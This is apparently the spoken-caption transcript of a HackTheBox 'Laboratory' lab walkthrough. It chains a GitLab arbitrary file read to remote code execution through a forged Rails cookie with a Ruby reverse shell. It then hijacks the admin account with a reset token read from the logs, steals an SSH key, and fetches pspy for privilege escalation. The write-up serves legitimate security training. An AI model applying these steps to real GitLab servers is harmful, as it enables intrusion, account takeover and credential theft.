GitLab LFI to RCE - HackTheBox "Laboratory"

Captions
Hey everyone, before we dive into this video I just have two things to say. First of all, Hack The Box sent me this wonderful swag bag: I got a cool shirt, I got a cool t-shirt, I got a cool sweatshirt, I got a cool mouse pad, I got a cool hat, everything, and I just wanted to say thank you. I really don't give Hack The Box as much love as I should, so what are we doing today? We're doing some Hack The Box, and I want to shower them with love, because thank you guys, thank you so, so much.

And on that note, bringing me to point number two, I wanted to bring your awareness, bring your eyes over to the Cyber Apocalypse CTF 2021 that Hack The Box is doing super duper soon. Check it out. The back story here is "Ready to save the world?" The 22nd of April is International Earth Day, and guess what, the Earth was hacked by malicious extraterrestrials. Their ultimate plan is to seize control of our planet; it's only you who can save us from this terrible fate. It's going to be a five-day game, so a five-day capture the flag starting on Monday the 19th of April, which is coming up, all the way to the end of the week; they're ending Friday the 23rd. It is a team game, max of 10 hackers, awesome. Five days, should be from beginner to intermediate, so a lot of accessible content here, new content uploaded every day, so they're going to be rolling stuff out, Jeopardy-style game, and it's coming up quick. Here's the countdown, ladies and gentlemen: at the time of recording we are just under two days away, and you can register here by clicking that "Count me in" button. But check out the prizes for this thing. It's put together by Hack The Box and CryptoHack, so if you haven't checked out cryptohack.org, they have phenomenal cryptography challenges. I really want to make some videos for you, CryptoHack, but I know you have a rule that anything over like 40 points or something is not allowed, so hey, hey, hey. But these prizes are stinking fantastic and
incredible. It's open to everybody, which is great, and for every challenge that gets at least one solve, Hack The Box will be making a donation to code.org, so I love that; that's stinkin' awesome. code.org is a non-profit organization dedicated to expanding access to computer science education and increasing participation by young women and students from underrepresented groups. That's all great stuff, so hey, kudos to you guys, thanks for doing that, that's incredible. Obviously great, excellent, top-notch hacking content. These are the challenge categories, the stuff that you're going to expect to see; some really good ones in there. You got hardware, you got blockchain; that's not normally what you see, but it's good stuff. Look at these prizes: VIP, stickers, merch, swag, VIP+, Academy cubes and 1500 US dollars in cash, a hundred dollars' worth of Hack The Box swag card and Hack The Box stickers, an annual VIP+ and a thousand Academy cubes. This is unreal, so I would really recommend you go check that out. Look, huge numbers thrown across the board, good stuff, check it out. If you want to go register, you totally should; we've got about two days until the game starts. Go to ctf.hackthebox.eu, create an account, create a team and join the Cyber Apocalypse CTF.

I'll showcase that real quick here. Actually, I don't have LastPass configured on this virtual machine, it's not set up in Firefox, so I don't know if I can actually log in, but if you were to log in, type in your cool leet hacks or username, and then you do it, and then you click on Cyber Apocalypse CTF. Sign up today; it's totally free and it's gonna be a ton of fun. Obviously they've got support in the Discord server, it is on CTFtime, which is big, and that's it, that's enough of me yapping about that. But hey, that should be a ton of fun, and kudos to you guys for putting on an incredible game. I think there are, what, like 4,000 folks registered now, so it should be a huge game and you should dive
in. Okay, hey, let's do it, let's do the real video now, now that I've yapped for four minutes, but I really wanted to get that on your radar. Now let's dive into some actual Hack The Box content that I want to showcase. This is going to be the Laboratory machine, or "Labratory": I kept typing it without an "o", and then everything was wrong; I was literally mistyping the hostname over and over and over again. Disclaimer: I am not smart. This is an easy room, although I think some of the user ratings brought it up to about medium, and I would say medium seems a little bit more fair to me. Look, I was struggling, and I say I'm not smart because I can do easy rooms sometimes, not really all that often; I still struggle with the easy boxes, the easy machines, but I had to do some digging and I was banging my head against the wall for this one. So I wanted to walk you through my thoughts, bring you down every rabbit hole that I went down, and hopefully we can get some good learning lessons out of it. But I think that's a fine time to transition, and let's go to the screen.

All right, so I am over here inside of the Hack The Box interface, which is looking slick, if I may say; I love the new design here. You can see that Laboratory is the machine that is retiring at the time of recording, so I wanted to get this out here, and the IP address is 10.10.10.216. I have deployed the machine, it's up and running in the range, I've connected the VPN, and I have already gone through this, so I gotta let you know, I'm not going through it live; I do have the hindsight 20/20 thing, but hopefully we can still showcase some good stuff. So I have a terminal with my Hack The Box VPN key that I am already connected with, but I do need to make a new directory for laboratory, with an "o" there, and let's hop into that and let's go ahead and take a look at that IP address, which we know is 10.10.10.216.
So we get started with an nmap, same thing we always do. I'm going to go ahead and create a directory for nmap so I can save all my things in there, and I will use nmap -sC for default scripts, -sV to enumerate versions, -oN to output in just the nmap format, and I'll call it initial. I will actually tack in a little -v there for verbose so I can see everything as it comes by, and we'll add in that IP address 10.10.10.216. All right, there we go, looks like it's gonna get started and immediately find some ports: 22, likely for SSH, 443, HTTPS, and 80 for, excuse me, default HTTP, like a flat, classic web server here, but it does have HTTPS, which is good to note. So I have some results here, and I'm actually going to open that up in Sublime Text so it's a little bit more readable. You can see we do have port 22 open, that SSH, as we mentioned, port 80 in here, and I would immediately just want to start to run and go look at that web server.

Now, I missed something going through this, because I did just that: looked at port 80 and wanted to explore the web service, and I didn't fully read, probably, what I should have out of this 443. Originally I actually ran this with RustScan, which was good because I was moving quick, but it didn't end up doing all the same scanning that this command would have done with -sC, -sV, etc. So I'm going to avoid that elephant in the room for the moment, just for suspended disbelief, and drive us down the road of looking at just this web page, which is that 10.10.10.216.
Now this redirects us to laboratory.htb, and as we could tell from those nmap scan results, it does redirect us to this specific domain, so we need to add this domain name, laboratory.htb, into our /etc/hosts file. So let me do that real quick; I'll just use nano on the command line here, so that way I can trigger all of you Vim fanboys, all your Emacs fanboys, everyone that doesn't use nano. 10.10.10.216, and it is laboratory.htb, done-zo. Okay, so now reaching back to this address here, it brings us and redirects us to HTTPS. Now, this is something that is worth noting, because it has a certificate set up for it, and we should probably do our due diligence and actually go look through that certificate: hey, what is actually in the mix, what does it do, etc. Again, in the moment, that's something that I just sped right past.

So we're greeted with the "Laboratory Security and Development Services", a nice little web page here: "Laboratory provides high quality security and development services at a low price point", and there's some boilerplate stuff in here: identity management, secure development, cryptography services. I like the memes in here: "we all know great crypto like ROT13 and Base64", hey, that's all I know, that's great crypto to me. Threat hunting, cool, red teaming, and everything that I seem to find here is a link back to nothing. We got testimonials from Dexter, from Dee Dee, from Anonymous: "this guy's a good hacker but he's also a good coder, it's like magic, you never get that combo". And so, yeah, hovering over the blog or the "coming soon", hopefully links, or even these socials, they bring us to just a little "#", so an internal link that doesn't go anywhere. And there's a funny note: "hey, if you find a vulnerability in this website then you're totally lying, we're 100% secure and I'm sure you can't hack us, if you do definitely don't let us know". Nice. So yeah, even literally just viewing the source on this, like I hit Ctrl-U on my keyboard, you could
right-click and view source. This is all just going to internal stuff, going to static pages and CSS out of the assets folder, using some cheesy, boring JavaScript that should just come from the theme and display the web page itself. These elements that are commented out, those little elements.html or generic.html, maybe these would be links, so I tried to go to them, but that returns a little 404 for us, so that wasn't really all that helpful, and there wasn't anything else to look through. I went to go take a look at that images folder and that assets folder in case there was anything interesting other than those static files that it might end up serving out, but no, we weren't getting any easy wins for this easy box with our easy smooth brain right now. So that didn't seem to work for us.

I was banging my head against the wall here; I would fire up Nikto, I'd fire up Gobuster, and I would do some stuff, but I really should have taken a better look at this certificate, because if we actually take a look at this thing, I'm pretty sure this will end up telling us, hey, we actually have another subdomain in here. Not only do we have laboratory.htb, but you also have an alternative name, git.laboratory.htb. Ah, so that again, of course, is another domain name that we need to add into our /etc/hosts file, so let me go do that: duplicate that line here, add in that git prefix, cool. And as I mentioned, if we were actually reading the output of what our tools gave us, we would notice that, hey, they actually have that right here in the nmap results: we have a "DNS:" entry here, git.laboratory.htb. So what are we going to be looking at? If I were to go to git.laboratory.htb, again another certificate warning, totally cool, let's breeze right by that, but we're greeted with GitLab, a GitLab Community Edition, and immediately I'm like, what do I do? I don't know any username or password. Like, I could try the stupid
admin/admin, I could try the stupid admin/password, I could try the obvious answer every single time, but that still didn't get me through the door. So I thought, well, can I just register an account? I'm like, yeah, all right, I'll create a test user, test, test@test.test.com, and "username is already taken", probably because this instance that I run through is still live. So let's just call this john, let's do john@john.com, how about that, john@john.com, and the password minimum length is eight characters, so I just use the password "anything", although there is an error: "the email domain is not authorized for sign-up", which I guess makes sense, john.com isn't exactly a thing. But maybe this is a neat little gimmick; they want us to use laboratory.htb, and again I'll add the password "anything", so that will log me in. All right, "welcome, you've signed up successfully", super cool.

Here we are, here we are in GitLab. I don't have any projects. If I were to take a look, are there any starred projects, or I can explore projects, and this is actually interesting: we ran into Dexter McPherson, their secure website repository, "100% unhackable HTML and CSS based website". I would take a look at this, and I noticed there was only one commit, so there wasn't a whole lot really to dig through, and it was all these static files that we originally saw when we were looking at the web page, so that was basically useless. I wanted to check just in case, just in case they were sneaking anything in, if anything were different between this version, the repository version, and maybe the live production version, but no, it all seemed to me to be the very, very same, and I was cruising through the assets and images directory, but nothing was there. So okay, at that point I was starting to think, all right, well, we've got a GitLab instance. It is not uncommon for us to have, if there's some accessible program or solution, right, whether it's a CMS, whether it's GitLab, whether it's another
utility that's known out in the world, that's public, are there any potential CVEs or publicly known vulnerabilities for this thing that could be exploited and could get us a little bit more access? So when we're looking at GitLab, I want to specifically know the version of GitLab that is running. The way you could track this down: hey, we're logged in, thankfully we are authenticated because we can register a user, but over this little question mark here there is a help dropdown, and that help dropdown will straight up tell us, yo, this is GitLab Community Edition 12.8.1. So I'm like, all right, that's great, now we know the software name, GitLab, right, and we know the software version number, 12.8.1, and that will help us narrow our search. Especially if you are trying to work on OSCP, if you're trying to work on any sort of certification exam that is testing your ability to look up and find and research vulnerabilities for a specific software, those are the two ingredients that you might really need.

Then we can search through Exploit-DB, or the Exploit Database, and see if there are any known vulnerabilities for this sort of thing. I will use searchsploit, which I actually have set up inside of my Exploit Database repository that I've cloned, and actually, as a good thing to do when you're doing this, try and just pull down and update your repository. The same thing goes for running Metasploit with msfconsole: make sure you run msfupdate before you're going to fire something off, because if you're doing research and you're looking for new low-hanging fruit, you're looking for a new vulnerability, you're looking for a new exploit, you might be able to throw it, maybe something new was added. So it's always a good thing to remember: hey, go update searchsploit, go update msfconsole, Metasploit, and do all that. So let's run searchsploit looking for GitLab, just simply searching for the word, the string "gitlab", so I've got some good stuff that immediately pops up.
GitLab impersonation, maybe privilege escalation, doesn't have a version attached there; 11.4.7 RCE authenticated, that's a little too old for us; 11.4.7 remote code execution; 12.9.0 arbitrary file read and 12.9.0 arbitrary file read, I'm assuming that's going to end up being authenticated. I'm zoomed in a little bit too much to showcase that, there we go, and there's a Metasploit module, supposedly. Ah, okay. Well, let's take a look at some of these, because the 12.9.0 is interesting to me, because we're at 12.8.1. Now there is no guarantee, when we make this logical conclusion, right, that a version number that is higher is known to be exploitable; maybe that vulnerable code was only introduced in that specific version, so maybe it's specific to just that 12.9. But there is the case, hey, maybe that code existed before and it wasn't patched until this version, so maybe, potentially, this could read GitLab less than 12.9.0.

So anyway, let's go ahead and take a look at what this thing is. There is an explanation with a .txt file and there is a 49076.py Python file, and there's a Metasploit module, so maybe that would be worthwhile to look at, but first let's play with this code here to get an understanding as to what this exploit does and how it works. So I will hop back over to my directory for this guy, and I'll make a directory, "exploit", I guess, and I'll use searchsploit -m to mirror that, or bring that file in here. There we go, now it's present in this directory, and again I'll use Sublime Text to open this up. Exploit title, everything we've already read, Google dork, back in 2020, version tested on GitLab version 12.9.0. "You can create as many personal access tokens as you'd like from your GitLab profile: sign in to GitLab, in the upper right corner, click your..." Okay, do we need to create a token for this to work? I guess so. Oh, we need to install gitlab and requests, GitLab's little API tool. Oh, and it would specify a cert here with the session
object that's created from requests, or you could set session.verify to False. Let's do that, because I don't actually have a copy of the cert. And then it runs the exploit, a little function. Do we have to supply the host? It doesn't look like it takes arguments. What do I do with this? exploit takes in a project name, issue title, files and token, and it creates an issue, no, creates a project, creates two projects and an issue and moves it, okay. But in the main function we have "write files" with "sensitive files", what? That's opening it out locally on my machine, and it calls exploit, and the token isn't even passed in; it doesn't pass in the token that's needed, I'm assuming that's needed. What is this script? Does this work? Oh gosh, is there something weird going on, what's up with these spaces that aren't spaces? Some of those just straight up aren't spaces. Let's replace all those with the space indentation. Oh god, these things have extra spaces now, how about that. "No module named gitlab", oh my gosh. pip has been weirdly slow for me when it's trying to download stuff, I don't know why. I'm gonna pause the recording just to see if I can let that thing go.

All right, gitlab is here, we made it, we installed gitlab with pip. Now let's run this again, and it doesn't have that "sensitive files". What is that supposed to be? Is that supposed to be something that I want to read? "exploit() missing the token", yeah, I don't get this script. I'll be honest, I'm not exactly positive how this is supposed to work through it all, and I don't want to end up creating a GitLab token, I mean, I will if I'm supposed to, but how does this work? What is the CVE for this thing? Is there a CVE for this thing? Is there more research and reading that I can do? Let's Google this. Exploit-DB, here's a little Facebook entry, this is a link back to Facebook, I don't know if I want to go to that one. What does this showcase? Ah, get out of here. No, never mind, never mind, we're not going to
Facebook. This is the very same one that we just pulled down, yep, from Exploit-DB. This one has a lot more to it: it logs in with their username and password, grabs the CSRF token, yeah, okay, maybe that one will be worthwhile. What's this GitHub one? GitHub, oh, oh, they tested it on our exact same version, GitLab 12.8.1: "In a recent engagement I found a GitLab instance on the target. I found a proof of concept on Exploit-DB that uses LDAP authentication, which was disabled in this case, so I created this Python script which, I thought, using the web GUI, two projects, an issue in one of the projects with the malicious payload, that moves the issue from one project to another, automatically reads the file contents." Ah, oh, this is kind of nice. It asks for the absolute path that you want to read, it will write it, okay, nice. Let's play with this then. Yeah, let's use this; I'm just gonna open this up in raw and slap this into a little exploit.py. Okay, reading through this, because I don't want the internet to get mad at me for just blatantly running code that I ripped off the internet without reading it; it doesn't look like it's going to delete any files, so obviously totally safe, I'm just kidding, I'm only half kidding.

Let's go ahead and run this. python, no, no, let's run python3 exploit with the URL, username and password. Okay, so we need https://git.laboratory.htb, john, and the password is "anything". Yeah, yeah, okay, logged in, nice. Absolute path to file, let's see if we can get, can we get /etc/passwd? Well, is this going to be like local file inclusion and read out /etc/passwd? It did the thing. So root user, of course. I'm looking for users that are non-standard or would have a user ID, like a UID over a thousand, because those are probably going to be a regular user; maybe they have SSH keys or something that I could read, but I don't see any of those, just gitlab, gitlab, gitlab, gitlab stuff, 996.
None of those would likely have a... these have a shell, /bin/sh, but their home directory I doubt would actually have an SSH key installed. Let's try it again, let's try and get their home directory .ssh/id_rsa. Nope. Am I, for whatever reason, running as root? Can I just read /etc/shadow? Probably not. No, access denied, okay, so that's not exactly helpful. Okay, what do I do with this then? I have local file inclusion. Could we look at logs? I would want to do a log poisoning, like a cache log poisoning thing, but it's not going to end up running or evaluating that code. How could we take this local file inclusion and bring it to RCE, remote code execution? Did they talk about anything else in this post? What did you do for your engagement, the white hat hacker, what do you got here? Dependencies, usage, are there any examples? No, just credits: "thank you to vakzz for finding this bug in GitLab". Pretty sure I've seen vakzz in the OpenToAll CTF team. The HackerOne report, oh cool, oh cool, this is the legit disclosure, that's the legitimate finding back on HackerOne, that's kind of slick, 20,000. Okay boys, what are we doing, what are we doing on YouTube? I need to jump on this bug bounty bandwagon.

"UploadsRewriter is the issue, allowing arbitrary files to be copied." What a cool bug. Oh, there's a video showcasing this file read, let's check this out. This is just a proof of concept for reading the file though, isn't it? Yeah, he moves it to another project, my face is in the way, I'm very sorry, he just moved it to a different project, and then there's the attachment for passwd, which if he were to open up is /etc/passwd. Slick, okay, he did it, and etc, etc, etc. GitLab's like, "thanks, thanks for submitting this", yep, nice, that's awesome. "It's also possible to turn this into RCE as the cookie serializer is set to hybrid by default. This can be done by first grabbing the secret_key_base from /opt/gitlab/
embedded/service/gitlab-rails/config/secrets.yml", and then, using the arbitrary file read, read from this file, right, "and then use the experimentation_subject_id cookie with the marshalled payload. Payload can be generated by changing your own GitLab instance's secret_key_base to match, then running the following in a Rails console." There's all this code here, okay, and then there's a little inject as to what commands you want to run, and you just send it with curl. That's slick, it's executed, okay.

Okay, well, let's get that secrets file. Let's run that exploit again, let's pass in this /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml, pull that down, and okay, we get a lot of stuff. Looks like a private key, okay, that's for the OpenID Connect signing key, so it's not going to be like an SSH key. Let's copy all that and just save it out, because the secret_key_base is present here. Nice, let's take note of that, let's do a secrets.yml, what's that called, secrets, secrets with an s, plural, slap that in, and we have our secret_key_base, so that should be something we should keep in mind. Okay, now we would need to marshal this, set up this payload. "This can be done first by grabbing..." so this says I need my own GitLab instance. Can I get a GitLab in Docker, GitLab 12.8.1 Community CE, in Docker? That's a thing, yeah, gitlab/gitlab-ce. I mean, okay, it does it, how do I use it? It's a thing that exists. Is there anything that showcases this? What do we Google? We Googled for GitLab arbitrary file read, let's bring it to RCE. WhiteHat hacker has something, Rapid7 has something. Oh, is this the Metasploit thing, is this what this Metasploit module would do? Let me just experiment real quick, let me just see if the Metasploit module will work for us, so let me do that, msfupdate, please. Walk the talk, talk the... how do you say, not just talk the talk but really walk the walk as to what I'm saying here. Let that run with msfupdate and let's see what else
we can get. Vimeo, oh, there's a video on this thing, video hacks. I don't think there's any issue with me playing this, so let's go do it, let's see what he does. I think, wait, wait, wait, oh, he set up a Docker thing. This is super hard to read, and I don't know if you can actually see it: docker run --rm -d --hostname gitlab, and they're using that specific version. Can I steal that, can I grab that syntax? I should have created a README file; I know I would never use it, but it's just for the novelty. Syntax: docker run --rm -d --hostname gitlab; they use vh, I'll use jh for John; ports 443:443, 80:80, so it's mapping the Docker container ports to my local machine host and ports that I can actually access, 22:22 to access SSH. The name of the container can be gitlab, and then it should be gitlab/gitlab-ce:12..., and this is just the image name that we just saw on Docker Hub when we were Googling, so gitlab-ce 12.8.1, whoa, 12.8.1-ce.0, is that a thing, is that right, will that work? Let's see if I can do it. Is something going wrong with Metasploit? Maybe we don't need it, well, let's put that away, we'll let it do its thing, and I'll see if we can get this Docker thing to work for us. It doesn't actually have that image, so right, it's got to pull it down, totally fine, it'll take a little bit, and GitLab is usually slow, I think.

I just want to check this video: so they start recording this at 11:17, and then they start their Docker instance, and then they go back to the web page at 11:23, I thought I saw for a second there, yeah, 11:23, and then 11:35 so they can finally refresh it and actually interact with this GitLab instance. So that's going to be waiting for a while. They log in, they create this account, they have the other repo so they can do the proof of concept to read local files, yep, okay, I see them with /etc/passwd, and then they pulled out the secrets file, okay, so they get their secret_key_base, and then they jump into
the container, docker exec -it gitlab /bin/bash, load it up with gitlab-rails console, and okay, okay, and then they can mess with it. But they don't need... they haven't changed the secret_key_base on their instance, because they're just testing it on their instance, but they are running the exact same commands that we saw in that original disclosure. So okay, can we do that exact same thing? Docker is still pulling it down. There we go, now we have it. Is that actually running? I see gitlab. I'm zoomed in way too much here, I'm sorry. docker ps, gitlab is running with gitlab, okay, so let's see if I can get into this. /bin/bash should be at the very end, and gitlab, the container, should be what we wanted, okay, cool, so now I'm in that container. Can I see... I want to give this a little bit to set up, because it might be still building. I want to see if the secrets file has been generated or created already. HackerOne, I'm way too zoomed in. Let's grab this secrets file and let's actually slap this into a README so we can refer to it later. Does this file exist? It does, okay, but it's going to be different, because this is our local instance, this is our own clone and our dummy testing to see if we can marshal some of the data, but we might need to actually configure the secret_key_base.

How do I do that? Set the secret_key_base, GitLab community, just Google it around. Application secrets, where secrets are stored, Omnibus, /etc/gitlab/gitlab-secrets.json, is that a thing? I just see this file path here, and part of me is wondering if that's what I need or not. Let's grab that, because I could just straight up nano the secrets.yml file, like I could edit this manually, but it does give us this warning: "hey, this file is managed by gitlab-ctl, manual changes will be erased; to change the contents below, edit /etc/gitlab/gitlab.rb and run sudo gitlab-ctl reconfigure", so I don't know if it'll stick the way that it should, so let's
nano that secrets.json, and okay, I see gitlab_rails is here with that same sort of config, but we need to grab the secret_key_base that's present on the target. So I'm gonna nerf this, paste that in, replace it with the target's secret_key_base, and then let's try and run that gitlab-ctl reconfigure command that they suggested and let's see if this comes together. It's slow; I can't tell if it's still setting up the instance and everything. Gosh, all right, I'm going to wait on this, I'm going to let this go, and let's see, did Metasploit actually come back at all? It just died, whatever. See about what, excuse me, oh hey, are our reconfigures working down there? Can I run msfconsole, please? What if I sudo this thing? I know it's weird to... okay, I broke Metasploit, that's fine, I can deal with that later, I suppose. GitLab is reconfigured down in our Docker instance, though, so let's see what we got.

Now I want to check out the secrets file. It has not been changed, because our secret_key_base is different. Did I do that wrong, or did I... oh, I don't have less. I'm in the Docker container, right? Yeah, that's still not right. What happened to our JSON file? Let me nano that. Is that the right... that's not what happened. I'm going to reconfigure all of these just to be safe about it, or just to be kind of anal about this thing. So the db_key_base we can change, slapping that in, the otp_key_base, let's slap that in, oh shoot, I did not get in the middle of my string quotes. And now we need to actually get that private key in here. Oh, that's going to be a pain, because it has newlines and it's all jotted into one line. Actually, we might be able to do that with some Sublime Text magic: I'm going to take this entry and then bring it into its own document, dedent it here, and let's have Python just create this as a multi-line string. Yeah, so now viewing that out, and it's in raw mode returning it out, it has the
newline characters in here all for me, so I can copy that, and that's done, easy peasy. All right, so theoretically that will work. Let me make a copy of that just to verify; what did I just edit? I just edited the JSON file, so let's copy that into /tmp/ours.json, and let's run that reconfigure, I suppose. Hopefully, maybe; if not, we can just try it and see if we get anything, just to validate that the RCE or the command code would work, but we'll see, we'll see if this works. Reconfigured, now let's check out our YAML. That looks perfect, okay, great, the 323 is what I wanted to see. So that video ran this in gitlab-rails console, right? See if this ever comes back, but we have the syntax for what we should run here, in this right here, okay. I could put this in our README again, but gitlab-rails console is taking its sweet time. I'm spooked.

We have to keep in mind, though, we're likely on the target running inside of a Docker container, because we didn't have any users in there when we looked at /etc/passwd, and if we're in a Docker container, we're probably in something that is just like this Docker container, which means that we probably don't have netcat or ping or Python. So we know we're gonna have Ruby, right, because the gitlab-rails, Ruby, I mean, Rails is gonna end up being written in Ruby, so maybe, yeah, we're literally in a Ruby interpreter, so maybe we could try a Ruby reverse shell. Now I'll add the disclaimer: this is where I was tripping over myself repeatedly, because I wasn't thinking, and that is when I would try to ping, I would try to netcat, and I wouldn't get a callback, but then later, when I did something else, I ended up simply noticing and seeing the error messages like, hey, that command is not found, it's not actually retrieving anything, it's not able to execute that. So Ruby, I think, would work, and Ruby, I think, did work, so I'm gonna use no sh, so we aren't depending on a... I should really put this in the stinking
actually, I can just throw it in here, can I? But I need to make sure that these double quotes are escaped out, because this isn't a string on its own. Double quotes... let's double-quote that, or escape that, escape that. There's an if with a string there, and also remove or escape out the double quotes on "failed". Yeah, okay. So now I need to know my IP address, though. Let's get out of this one, and I am 14.25, so slap that in. Cool. And rather than this little proof of concept, let's see if that will actually execute for us. Let's set up a listener, nc -lnvp 9001, and I'm going to be kind of anal about this and just copy these commands in one by one, just to see what happens, just to kind of know what goes down. So in the GitLab console, let's grab the request object, request environment, check out the cookies, and now let's add in this whole long line to create our Ruby command set as a string or object, and then define it. Oh, and that actually gets a connection. Okay, from our testing thing. Oh, okay, that's a shell. Let's start up a shell. Then let's try with the cookie. It tries to run it again, but it gets that connection refused because I'm not listening. I wanted to see what this cookie looks like, which is this output. Okay, so now if I were to listen and take this whole cookie, we could use that in the exact same kind of syntax and structure that they use with this curl command. Let's copy that, and we need to change the location that this is going to, because it's not going to go to a local GitLab VM, it's going to go to git.laboratory.htb, and let's add -k to ignore that certificate. Let's grab this whole syntax to replace it with that big value, and let's see. Going back to our terminal, I am listening over here. Now let's try and run that curl command just by slapping it in, and we get a connection, and commands work. Okay, okay, awesome. This is not a full shell. This would not play well with pwncat, because it's like this weird subshell thing out of Ruby.
We could try and stabilize this, but I don't think we have Python, we don't have script... oh, do we have script? But right now we're in, like, the subcommand of Ruby, which is really weird and messy. What do we have here? I'm gonna look around. This is the Docker environment. That's super annoying. What else can we do? We could try and break out of this Docker environment, we could try and get, like, deepce in here, but there's not going to be anything at home, there's not going to be anything really worthwhile on this. We could try and break out of the Docker container, we might be able to... oh, but I mean, since this is Git, maybe there's something more in that dexter account. Like, when we were looking at the other projects in this GitLab, dexter has his thing. Maybe we could get into dexter's account. Is there a way to do that? Like, we could probably track it down or find the secrets in here within the Docker instance. "gitlab change a user's password"... that's really not gonna come up with anything useful. Can I... maybe, are there any secrets that would come out of this arbitrary file read that allow us to do that? Let me Google this one more time, and then maybe, like, "change password pakistan"... oh, exploiting CVE, the CVE that we saw for a default GitLab installation. There are a couple such files. Is the... what? Yeah, I guess we don't know the username of that dexter or that admin account, supposedly, but this is showcasing the same thing that we've used thus far. Oh, but that does have a section over changing users' passwords. They use python-gitlab, okay, and that's how they do the same thing, originally the same vulnerability, but production.log. production.log, what is production.log? That's new. Is there a full path for that? Where are they getting production.log? production.log... oh, gitlab-rails, okay. "The production.log file contains the reset password token values that are generated as a result of requesting a password change for a
registered user. These values can be used to drop a user's password." Ooh, okay. So can I read that? Let's go back to run our exploit script. Ah, dang it. https://git.laboratory.htb... John, anything? Go, great. Let's paste in that path to the production.log, and it gets a lot of stuff. Okay. So now what? "You could try and reset a built-in admin's password if it left the default admin@example.com." Is that genuinely the default? Next, "trigger a password reset for discovered users via the /users/password/new endpoint." Is that a thing? Let's go back to the GitLab here, /users/password/new. I'm already signed in; do I have to sign out to be able to do that? /users/password/new, okay, and then the email. We can try to see if we can reset the password for the default, but maybe default admin password... yeah, okay. Okay, so after doing that, according to this thing, next we can download production.log to extract that reset password token value. Oh, okay. So let me try that again. Oh shoot, I lost the production value, I lost that little file path. Slap that in, and now we have a ton of stuff. Okay, so again, just going to copy and paste all this. We could probably patch this thing, like modify this script to actually give us something that will just write it to a file. There's a lot of output here.

I will add the disclaimer: this instance is still running from when I was kind of messing with this previously and trying this kind of on my own, so you can see my attempts to run ping with that command injection vulnerability for the RCE that we had just done, or my attempts to run netcat, and I think even in here will be the old reset password tokens. So I need to be cognizant, and we always want to be looking for that last reset password token, because if that's triggered from us just making that request like we just did, then it's going to end up being... hey, something that... okay, how much is syncing? It's going to end up being the most recent one that we ran, right? So this is, like, from the very
very top. Oh shoot, jumped out of my VM for a second. Let's make this thing, and this is going to be humongous, and this is actually probably running it twice. But let's look for that reset token. reset_password_token... what was that thing called? reset_password_token. reset_password_token. Those are all filtered. Let me go to the very, very last one. Filtered, filtered, filtered, filtered. Oh no, is it actually filtered? Are we not going to be able to see it? What the heck? What the heck? What, what, what is it? What are they tracking down? What do they get? "Reset password instructions". Reset... I was just looking at their "Reset password instructions". Let's go to the very, very last one, and now this, I'm assuming, is going to be the key for us that we could use to change their password. So after we have that, then we can go to /users/password/edit with that token that's just stored in the logs. So let's grab that: git.laboratory.htb/users/password/edit with that token. Let's see if we can actually hit that. And we can. Okay, okay. So let's change our new password. I will make that, like, "password". Dope. "Your password has been changed successfully." Okay. So if we were to sign in, admin@example.com, because it will take an email, now our password is "password". Can we log in? Yes. All right, okay.

So we have the SecureWebsite that we saw previously, and we have SecureDocker, "confidential secure docker config for home server", also some personal stuff, "I'll figure that out later". Personal stuff... ooh, there's a dexter folder, .ssh. Okay, okay, there's a private key in here. There's a private key in here. We can work with this. Let's copy this entire thing, and if the username is likely dexter, right... hey, get out of here, get out of here, exploit. Let's make a directory, ssh, subfolder dexter, id_rsa, slap that in, make sure the newline is there, which is good. Let's make that 600 for permissions, so that way it's actually going to play nicely when we try to use it with SSH. dexter is likely the username, as we can kind of indicate from seeing
that either on the website and that folder in the repository. laboratory.htb, always gotta remember that. Oh, we're in, we're in, we made it. We got user.txt. Boom. Okay, user.txt. We could submit that; this is now a retired room, hopefully, so a retired machine for us here. But now what do we do? Now we want to privesc. dexter is seemingly the only user. lxd is in here. root is the only user. Do I have any sudo permissions? We don't know his password. Damn it. Okay. Any weird files? Something in /opt, containerd. Not allowed to work in it, okay, it's owned by root. How about in the root of the file system? Not in a Docker container; we don't have the .dockerenv file. But we could be, like, running LinPEAS or something, or use pwncat if we wanted to. You could actually connect to this SSH with pwncat. Let's look for some setuid binaries, I guess. Do that kind of manually before we pull out the big guns. There's a lot of snap in here. ssh-keygen is kind of normal, I think we see that a lot. polkit-agent-helper, also the dbus helper, snap-confine. passwd is normal, mount is normal, at is sometimes normal. /usr/local/bin/docker-security, what the heck is that? That I don't think is a normal thing. That's not a command, though, it's not normally, like, a utility. It was like a straight-up... there was a straight-up, like, privilege escalation Google quote, maybe that's a thing. So we could run LinPEAS, we could run LinEnum, we could run any other automated script to detect stuff. And truthfully, in the moment I was trying to understand, okay, am I needing to get some other access within or without of the Docker container? Because we did have access to that Docker container. I saw lxd was in here. Is my group... am I in a group that allows me to do anything? No, I'm not in the lxc or docker groups or anything. Like, docker: permission denied. We could upload our own, but it'll still kind of error. There wasn't a ton. So I did eventually come to the thought, like, oh, I should try and run
like pspy, because I wonder what's going on. Like, when I was doing some of my enumeration... let me get back on the box here. I would check out ps aux to see, like, what processes are running, or I would use netstat -tunlp to see... no, netstat is not installed, so you could use, like, ss -l or whatever. But I saw a weird sleep thing being run by lxd, and the containerd that we found in /opt was just kind of odd; it looks like a non-standard containerd thing. There's our reverse shell. So I was wondering if there's anything else going on, because what is running sleep? Like, root is running sleep. Why? That makes me want to see what's happening on this file system. Do I actually still have pspy? pspy, pspy, pspy... I don't. Crap. All right, let's go get pspy. pspy64, please. Go, go, go. Let's do it, let's do it. Download, save. Let's get into /opt, move from my Downloads that pspy64 here. Good.

I'm gonna run updog just to spin it up. If you haven't heard of updog, it's really nice. It's essentially... god dang it, what is updog? And now we get into the meme and the joke. updog on GitHub is a replacement for Python's SimpleHTTPServer. So if I were to try and go ahead and access this, like, localhost, I think you put it on 9090, pretty sure. It allows uploading and downloading via HTTP and HTTPS, can set ad hoc SSL certificates, so it's just a really handy up-and-down, like, file transferral thing. Yeah, yeah, see, check it out. It's like Python's SimpleHTTPServer but much better. So now we can hop over to /dev/shm. I like to work out of shared memory. Let's wget... do we have wget? I mean, we're on an actual machine now, so we should. 10.10... my face is in the way. 14.25:9090. Let's get pspy64.
